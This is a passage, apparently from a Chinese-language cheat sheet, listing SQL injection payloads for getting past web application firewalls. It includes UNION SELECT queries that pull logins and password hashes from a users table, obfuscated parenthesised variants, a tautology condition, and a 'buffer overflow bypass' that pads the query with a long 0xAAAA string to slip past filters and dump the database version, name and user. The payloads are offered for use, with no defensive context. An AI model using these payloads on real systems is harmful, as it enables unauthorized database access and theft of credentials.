03./?id=1+union+(select'1',concat(login,hash)from+users)
04./?id=(1)union(((((((select(1),hex(hash)from(users))))))))
05./?id=(1)or(0x50=0x50)
11.缓冲区溢出绕过
这个是从国外一个博客看到的：
01.id=1 

and 

(select 

1)=(Select 

0xAAAAAAAAAAAAAAAAAAAAA)

+UnIoN+SeLeCT+1,2,version(),4,5,database(),user(),
8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
02.,27,28,29,30,31,32,33,34,35,36–+
其中

0xAAAAAAAAAAAAAAAAAAAAA 这里 A 越多越好，一般要求 1000 个以上。